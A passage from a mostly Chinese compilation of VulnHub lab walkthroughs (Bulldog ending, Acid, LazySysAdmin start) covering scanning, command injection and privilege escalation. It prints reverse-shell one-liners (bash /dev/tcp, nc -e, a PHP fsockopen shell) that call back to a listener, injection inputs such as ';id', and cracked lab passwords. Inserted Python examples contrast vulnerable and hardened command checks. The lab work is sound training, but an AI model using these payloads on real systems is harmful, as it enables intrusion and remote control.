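/></p><p>The bypass in step 4 works because the web shell validates only the first word of the line and then hands the whole line to a shell, so everything after && runs unchecked, and the redirections in the bash -i one-liner are interpreted by that same shell. As an added example (not the Bulldog application's own code, which this page does not reproduce), the following Python contrasts that flawed check with a hardened one that rejects shell metacharacters, splits the line with shlex and runs the whitelisted program without a shell. The whitelist is an assumption for the example; the page only establishes that ls is allowed and id is blocked.</p>

```python
import shlex
import subprocess

# Whitelist assumed for the example; the page only shows that ls is allowed and id is not.
ALLOWED = {'ifconfig', 'ls', 'echo', 'pwd', 'cat', 'rm'}
SHELL_METACHARS = set(';&|$`<>(){}\n')


def vulnerable_check(command):
    """The flawed filter: only the first word is compared with the whitelist."""
    words = command.split()
    return bool(words) and words[0] in ALLOWED


def run_vulnerable(command):
    """Whitelist the first word, then hand the whole line to /bin/sh: 'ls && id' runs both commands."""
    if not vulnerable_check(command):
        return None
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def hardened_parse(command):
    """Reject metacharacters, split with shlex, and require a bare whitelisted program name.
    Returns the argv list, or None when the command is refused."""
    if any(ch in SHELL_METACHARS for ch in command):
        return None
    try:
        argv = shlex.split(command)
    except ValueError:            # unbalanced quotes
        return None
    if not argv or '/' in argv[0] or argv[0] not in ALLOWED:
        return None
    return argv


def run_hardened(command):
    """Execute the parsed argv directly (no shell), so operators and substitutions are never interpreted."""
    argv = hardened_parse(command)
    if argv is None:
        return None
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout


if __name__ == '__main__':
    for cmd in ['ls && id', 'echo $(id)', 'echo hello']:
        print('%-12s vulnerable=%r hardened=%r' % (cmd, run_vulnerable(cmd), run_hardened(cmd)))
```

<p>With shell=False the argv goes straight to execve, so && and $( ) are just literal arguments to the whitelisted program; rejecting the metacharacters up front additionally stops them from being smuggled into a program that has its own interpreter (rm or cat are harmless, but a whitelisted python or find would not be).</p><p><img 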
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 尝试多次bash反弹,最后使用echo命令先输出命令,再输入到bash,反弹shell成功:</p><p><code>echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7969' class='md-header-anchor '></a>提升权限</h2><ul><li>步骤6:查看有哪些系统用户 <code>cat /etc/passwd</code>, 发现需要关注的用户有:bulldogadmin、django</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤7:查找每个用户的文件(不显示错误) <code>find / -user bulldogadmin 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><p>(1) 发现值得关注的文件有:一个是note,一个是customPermissionApp。</p><p>/home/bulldogadmin/.hiddenadmindirectory/note</p><p>/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</p><p>(2) 打开note文本文件:发现提示webserver有时需要root权限访问。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 打开customPermissionApp,看上去是可执行文件,使用strings打印其中的可打印字符:</p><p><code>strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><p>note文件中提示执行该文件,可以获得root权限,但通过ls查看文件权限只有读权限,并无法执行。</p><ul><li>步骤8:拼接root密码提权</li></ul><p>(1) 观察文件中只有这些字符,疑似可能与密码相关,英文单词包括:SUPER、 ulitimate、PASSWORD、youCANTget,这些都与最高权限账号相关,推测这是一个解谜题目:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>最直接的组合是去掉H,变成一句通顺的英文句子:SUPERultimatePASSWORDyouCANTget</p><p>(2) su命令无法执行,提示:must be run from a terminal,上次Vulhub已经遇到过该问题,通过一句Python解决:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>(3) 执行<code>sudo su -</code>,获得root权限,获取flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) 如果不解决无法su,还记得有23端口的ssh,也可以使用Xshell通过ssh登录,登录成功后执行sudo su - 提权并获得flag</p><p>用户名:<code>django</code></p><p>密码:<code>SUPERultimatePASSWORDyouCANTget</code>   不用猜测的密码,改了django再登录也可以。</p><p>sudo su提权,密码是:<code>SUPERultimatePASSWORDyouCANTget</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n8033' class='md-header-anchor '></a>靶场思路回顾</h2><p>1.目录暴破出dev和admin页面:</p><p>(1) 可暴破出dev页面,该页面源码里面有多个账号的用户名、邮箱、密码sha1值。该页面还链接到webshell命令执行页面。</p><p>(2) 可暴破出admin后台页面,登录密码通过dev页面破解sha1得到。</p><p>2.绕过白名单限制,执行命令和反弹shell:绕过限制执行命令比较容易。反弹shell尝试多次使用bash反弹shell后成功,没有尝试py shell。</p><p>3.搜索系统中id为1000以后的用户的文件,可以找到隐藏文件。</p><p>4.猜解root密码很艰难。</p><h2><a name='header-n8046' class='md-header-anchor '></a>思路总结</h2><h3><a name='header-n8047' class='md-header-anchor '></a>难点和踩到的坑</h3><p>(1) 发现和破解sha1:在dev页面查看源码,发现多个用户hash后,即使不知道是40位的sha1,也可以直接去cmd5破解,系统会自动识别,可以破解出2个账号。如果用hashcat暴破sha1,需要强大的字段和较长的时间。</p><p>(2) 反弹shell应该有多种方法:第一个想到的是bash shell,也想到了python反弹shell。只尝试了通过bash反弹shell,如果bash反弹不成功,可尝试往系统echo文件,赋予+x执行权限,执行脚本反弹。也可尝试Python是否能够反弹shell。</p><p>(3) 发现隐藏的包含root密码的文件,通过搜索id为1000之后的用户文件,查看历史命令,或者查看目录,也可能找到。</p><p>(4) 
猜解root密码:这个是最难的,找到这个文件并不难,但是通过strings查看文件内容,并且拼接字符串为root密码,感觉难度很大。</p><h1><a name='header-n8056' class='md-header-anchor '></a>第四节 Acid</h1><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">作者:红日安全</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">首发安全客:https://www.anquanke.com/post/id/10546</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h2><a name='header-n8058' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n8059' class='md-header-anchor '></a>下载链接</h3><p><a 
href='https://download.vulnhub.com/acid/Acid.rar' target='_blank' class='url'>https://download.vulnhub.com/acid/Acid.rar</a></p><h3><a name='header-n8062' class='md-header-anchor '></a>Target description</h3><p>Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors.</p>
<h3><a name='header-n8068' class='md-header-anchor '></a>Goal</h3><p>Obtain root and the flag.</p>
<h3><a name='header-n8071' class='md-header-anchor '></a>Environment</h3><ul><li>Target configuration: the VM is entirely web-based; extract the rar and run the vmx with VMware Player, with the network set to NAT so the target obtains an IP automatically.</li><li>Attacker configuration: a Windows attack machine on the same subnet with Burp Suite, nc, Python 2.7, DirBuster, 御剑 and other penetration tools installed.</li></ul>
<h2><a name='header-n8082' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul>
<p>Start the Acid VM. Because the network is in NAT mode, an Nmap scan of the NAT subnet on the VMware Network Adapter VMnet8 interface finds the VM's IP; save the results to a txt file:</p>
<p><code>nmap -sP 192.168.64.0/24 -oN acid-ip.txt</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/1.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Target IP obtained: <code>192.168.64.153</code></p>
<ul><li>Port scan</li></ul>
<p>Scan all ports 1-65535 with nmap, with service version detection, saving the results to a txt file:</p>
<p><code>nmap -p1-65535 -sV -oN acid-port.txt 192.168.64.153</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/2.png' alt='' referrerPolicy='no-referrer' /></p>
<p>A web service is found on port 33447 of the target; the web server is Apache 2.4.10 and the OS is Ubuntu.</p>
<p><code>http://192.168.64.153:33447</code> opens the home page:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/3.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Service identification</li></ul>
<p>Only the web service and Apache were found, so the only entry points are web or Apache vulnerabilities (if any exist):</p>
<p>Port: TCP 33447</p><p>Underlying service: Apache 2.4.10</p><p>Operating system: Ubuntu</p>
<h2><a name='header-n8124' class='md-header-anchor '></a>Detailed approach to vulnerability hunting</h2><ul><li>Web approach:</li></ul>
<p>(1) View the source of every page for hints;</p>
<p>(2) Brute-force directories with 御剑 or DirBuster to find new pages, then look for vulnerabilities in those pages;</p>
<ul><li>Apache approach:</li></ul>
<p>(1) Look for known exploitable vulnerabilities in Apache 2.4.10: none directly usable were found.</p>
<p>(2) Search <a href='http://www.exploit-db.com' target='_blank' class='url'>www.exploit-db.com</a> for an exploit: none found.</p>
<p>(3) Run a Nessus scan of the host: no vulnerabilities found.</p>
<ul><li>If no vulnerability can be found at all: boot Ubuntu in single-user mode and read the source.</li></ul>
<ul><li>Step 1: start with the home page source, which contains a hint: 0x643239334c6d70775a773d3d</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/4.png' alt='' referrerPolicy='no-referrer' /></p>
<p>The 0x prefix marks hexadecimal; decoding 643239334c6d70775a773d3d from ASCII hex gives: d293LmpwZw==</p>
<p>That is base64; decoding it gives the image name wow.jpg</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/5.png' alt='' referrerPolicy='no-referrer' /></p>
<p>From experience one can try the usual image directory names straight away: /image/wow.jpg, /images/wow.jpg or /icon/wow.jpg. Alternatively, brute-force directories with DirBuster, which finds the images directory.</p>
<ul><li>Visiting <code>http://192.168.64.153:33447/images/wow.jpg</code> returns the image:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/6.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Save the image locally and open it in Notepad++; there is a hint at the very bottom</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/7.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Decoding 3761656530663664353838656439393035656533376631366137633631306434 from ASCII hex gives 7aee0f6d588ed9905ee37f16a7c610d4, which is an MD5 hash.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/8.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Looking it up on cmd5 gives 63425, presumably a password or an ID.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/9.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 2: brute-force directories with DirBuster:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/10.png' alt='' referrerPolicy='no-referrer' /></p>
<p>The results show a challenge directory containing cake.php, include.php and hacked.php. With Burp Suite set as the proxy, visit the three files in turn from Firefox:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/11.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 3: visiting cake.php shows that it requires login:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/12.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Looking at the page title, or at the &lt;title&gt;/Magic_Box&lt;/title&gt; in the Burp response, reveals that a /Magic_Box directory exists; leave it for now and look at the other pages first.</p>
<p>Clicking login redirects to the index.php login page, which needs an e-mail address and password:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/13.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 4: include.php is a file inclusion page:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/14.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Entering /etc/passwd in the input box confirms the file inclusion; Burp shows the response:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/15.png' alt='' referrerPolicy='no-referrer' /></p>
<p>The aim is a shell through the inclusion, but there is no upload point and the wow.jpg found earlier contains no web shell to include. Move on to hacked.php.</p>
<ul><li>Step 5: visiting cake.php asks for an ID; try the number decoded from wow.jpg earlier: 63425</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/16.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Nothing happens: either the ID is wrong, or a login through the index page with e-mail and password is required first.</p>
<ul><li>Step 6: look for injection: all the discovered pages were scanned with AWVS; no injection found.</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/17.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 7: continue brute-forcing the Magic_Box directory found earlier, which reveals low.php and command.php</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/18.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 8: low.php is an empty page; command.php is a command execution interface:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/19.png' alt='' referrerPolicy='no-referrer' /></p>
<p>It runs system commands: entering 192.168.64.1;id and checking the Burp response shows that id executed successfully.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/20.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n8247' class='md-header-anchor '></a>Getting a shell</h2>
<ul><li>Step 9: reverse shell via PHP. Start nc on Windows listening on port 4444:</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/21.png' alt='' referrerPolicy='no-referrer' /></p>
<p>To avoid escaping and truncation, the payload placed in the GET or POST request must be URL-encoded. Bash and nc reverse shells were tried; both of the following payloads failed:</p>
<p><code>bash -i >& /dev/tcp/192.168.64.1/4444 0>&1</code></p>
<p><code>nc -e /bin/bash  -d 192.168.64.1 4444</code></p>
<p>A PHP reverse shell succeeds: URL-encode the following payload and send it from Burp:</p>
<p><code>php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/22.png' alt='' referrerPolicy='no-referrer' /></p>
<p>nc receives the reverse shell:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/23.png' alt='' referrerPolicy='no-referrer' /></p>
<p>But su cannot be run; it prints su: must be run from a terminal, meaning a TTY is needed. With no solution at hand, a Google search gave the answer: use Python to spawn a local shell:</p>
<p><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py</code></p>
<p><code>python /tmp/asdf.py</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/24.png' alt='' referrerPolicy='no-referrer' /></p>
<p>su now succeeds:</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/25.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n8282' class='md-header-anchor '></a>Privilege escalation</h2>
<ul><li>Step 10: list the users with <code>cat /etc/passwd</code>; the users worth attention are acid, saman and root</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/26.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 11: find each user's files (suppressing errors): <code>find / -user acid 2>/dev/null</code></li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/27.png' alt='' referrerPolicy='no-referrer' /></p>
<p>This reveals /sbin/raw_vs_isi/hint.pcapng, a network packet capture. Copy it to Kali and open it in Wireshark:</p>
<p><code>scp /sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/</code></p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/28.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Filtering to TCP packets only reveals saman's password: 1337hax0r</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/29.png' alt='' referrerPolicy='no-referrer' /></p>
<ul><li>Step 12: su to saman and then root to get the flag</li></ul>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/30.png' alt='' referrerPolicy='no-referrer' /></p>
<p>Then use sudo -i to escalate to root; the password is again 1337hax0r, and flag.txt is in the root directory.</p>
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/31.png' alt='' referrerPolicy='no-referrer' /></p>
<h2><a name='header-n8316' class='md-header-anchor '></a>Review of the approach</h2><p>The author's design can be compared with a walkthrough published abroad: <code>http://resources.infosecinstitute.com/acid-server-ctf-walkthrough</code> 
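</p><p>The foothold on both boxes is the same defect: an OS-command endpoint that validates only part of the input (the first word on Bulldog, nothing on Acid) and then hands the whole string to a shell, which is why <code>ls && id</code> and <code>192.168.64.1;id</code> get through. The following is an added example, not code from either box or from the walkthrough author: it reproduces that style of check beside a version that never invokes a shell. The whitelist, function names and sample inputs are constructed for illustration.</p>

```python
"""Whitelist enforcement for an OS-command web endpoint (added example).

Constructed for illustration; not the Bulldog or Acid source. ALLOWED is a
made-up whitelist in which ls is permitted and id is not, as on Bulldog.
"""
import ipaddress
import re
import shlex
import subprocess

ALLOWED = {"ls", "pwd", "whoami", "date"}
SHELL_METACHARS = set(";&|`$()<>\n\r")
SAFE_ARG = re.compile(r"^[A-Za-z0-9._/-]+$")


def vulnerable_accepts(command: str) -> bool:
    """Bulldog-style check: only the first word is compared with the
    whitelist, and the accepted string is then passed to a shell.
    'ls && id' is accepted because it starts with 'ls'; the shell runs both."""
    words = command.split()
    return bool(words) and words[0] in ALLOWED


def shell_would_run(command: str) -> list[str]:
    """Tokens of the accepted string: the chaining operator is a separate
    token that a shell (subprocess.run(..., shell=True)) interprets as a
    second command. Used only to explain the bypass; nothing is executed."""
    return shlex.split(command)


def hardened_argv(command: str) -> list[str]:
    """Validate the whole input, then return an argv list for
    subprocess.run(argv) with shell=False. Chaining operators, redirections
    and substitutions are rejected before anything is parsed."""
    if any(ch in SHELL_METACHARS for ch in command):
        raise ValueError("shell metacharacter in command")
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED:
        raise ValueError("command not in whitelist")
    for arg in argv[1:]:
        if not SAFE_ARG.match(arg):
            raise ValueError(f"unsafe argument: {arg!r}")
    return argv


def ping_argv(target: str) -> list[str]:
    """Acid-style endpoint that takes a host to ping. Parse the field as an
    IP address; '192.168.64.1;id' is not one and is rejected outright."""
    addr = ipaddress.ip_address(target.strip())  # ValueError if not an IP
    return ["ping", "-c", "1", str(addr)]


def run(argv: list[str]) -> int:
    """Execute an argv list without a shell and return its exit status.
    Any metacharacter that survived is just a literal argument here."""
    return subprocess.run(argv, capture_output=True, check=False).returncode


if __name__ == "__main__":
    probe = "ls && id"  # the chaining input used on Bulldog
    print("vulnerable check accepts:", vulnerable_accepts(probe))
    print("tokens a shell would see:", shell_would_run(probe))
    try:
        hardened_argv(probe)
    except ValueError as err:
        print("hardened check rejects:", err)
    argv = hardened_argv("ls -la")
    print("running", argv, "without a shell ->", run(argv))
```

<p>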
The main breakthrough points are:</p>
<p>1. Two rounds of directory brute-forcing: the first finds the challenge directory with cake.php, include.php and hacked.php; the second, on the Magic_Box directory, finds command.php.</p>
<p>2. After finding the command execution interface, use a PHP reverse shell; the payload must be URL-encoded when sent over HTTP.</p>
<p>3. su requires a terminal; without prior experience this had to be solved via Google.</p>
<p>4. Privilege escalation was achieved by searching known users' files and finding a password, not by using an exploit or msf.</p>
<h2><a name='header-n8329' class='md-header-anchor '></a>Summary</h2><p> </p><h3><a name='header-n8333' class='md-header-anchor '></a>Main takeaways</h3><ol start='' ><li>A command execution vulnerability can be turned into a PHP reverse shell; previously only bash or nc were used.</li><li>su requires a terminal; solve it with Python.</li><li>After getting a shell, search every user's files; there may be new findings.</li></ol>
<h3><a name='header-n8344' class='md-header-anchor '></a>Pitfalls</h3><ol start='' ><li>The file inclusion vulnerability: no way to exploit it was found and there is no upload point, so no shell could be obtained through inclusion;</li><li>su requires a terminal; lacking the knowledge and experience, this was solved with expert guidance and Google.</li><li>The way to obtain the e-mail username and password on the index.php page is too obscure; without the walkthrough from abroad it could not have been found.</li><li>Brute-force every directory you find; 御剑's default dictionary was not enough and the OWASP wordlist was needed. Directory brute-forcing bypassed the e-mail and password login above and led straight to the command execution page.</li></ol>
<p>In short, without Google and guidance from others this box could not be completed independently; more practice and broader thinking are needed.</p><p> </p>
<h1><a name='header-n8362' class='md-header-anchor '></a>Section 5: LazySysAdmin: 1</h1><h2><a name='header-n8364' class='md-header-anchor '></a>Target machine information</h2><h3><a name='header-n8365' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip' target='_blank' class='url'>https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip</a></p>
<h3><a name='header-n8368' class='md-header-anchor '></a>Environment</h3><ul><li>VirtualBox (either one)</li><li>VMware Workstation Player</li></ul>
<h3><a name='header-n8376' class='md-header-anchor '></a>Hints</h3><ul><li>Enumeration is key</li><li>Try Harder</li><li>Look in front of you</li><li>Tweet @togiemcdogie if you need more hints</li></ul>
<h2><a name='header-n8390' class='md-header-anchor '></a>Information gathering</h2><h3><a name='header-n8391' class='md-header-anchor '></a>IP discovery</h3><p>For host discovery on the internal network, netdiscover can be used.</p><p>netdiscover -i wlo1</p>
<pre class="md-fences md-end-block" lang="bash">➜  evilk0 netdiscover -i wlo1

Currently scanning: 192.168.21.0/16   |   Screen View: Unique Hosts             
                                                                                 
 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 42                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.0.100   08:00:27:da:8a:ac      1      42  PCS Systemtechnik GmbH</pre>
<h3><a name='header-n8397' class='md-header-anchor '></a>Port scan</h3><p>Scan with masscan</p><p>masscan 192.168.0.100 -p 1-10000 --rate=1000</p>
<pre class="md-fences md-end-block" lang="bash">➜  evilk0 masscan 192.168.0.100 -p 1-10000 --rate=1000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100</pre>
<p>Scan with nmap</p><p>nmap 
-T4 -A -v 192.168.0.100 -p 0-10000</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 nmap <span class="cm-attribute">-T4</span> <span class="cm-attribute">-A</span> <span class="cm-attribute">-v</span> <span class="cm-number">192</span>.168.0.31 <span class="cm-attribute">-p0-10000</span>        </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting Nmap <span class="cm-number">7</span>.50 ( https://nmap.org ) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span 
class="cm-number">20</span>:55 CST</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;">PORT     STATE SERVICE     VERSION</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">22</span>/tcp   open  <span class="cm-builtin">ssh</span>         OpenSSH <span class="cm-number">6</span>.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol <span class="cm-number">2</span>.0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| ssh-hostkey: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">1024</span> b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">2048</span> <span class="cm-number">58</span>:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">256</span> <span class="cm-number">61</span>:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)</span></pre><pre class=" CodeMirror-line " 